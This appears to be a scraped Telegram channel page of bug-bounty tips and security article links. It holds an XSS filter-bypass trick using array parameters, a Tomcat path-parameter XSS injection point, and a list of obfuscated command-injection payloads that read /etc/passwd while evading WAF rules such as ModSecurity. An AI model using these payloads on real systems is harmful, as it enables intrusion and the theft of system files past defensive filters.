Information Security
412 subscribers
157 photos
5 videos
9 files
2.28K links
Information Security News

we are @sec_nerd twin brother
Download Telegram
Alway convert parameter to array you will get unexpected result, some times xss bypass
Like,
path=/abc to path["]=/abc
#bugbountytip
Use path parameters if server is Apache Tomcat & running jsp pages . Like
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
JSON Web Tokens vs. Session Cookies for Authentication
https://t.co/ok14MFmdvL

Remembering the Shellshock Vulnerability
https://t.co/xUGGhKSvP5

4 Uncommon Python Tricks You Should Learn
https://t.co/bOOvVe92Us

#bugbountytips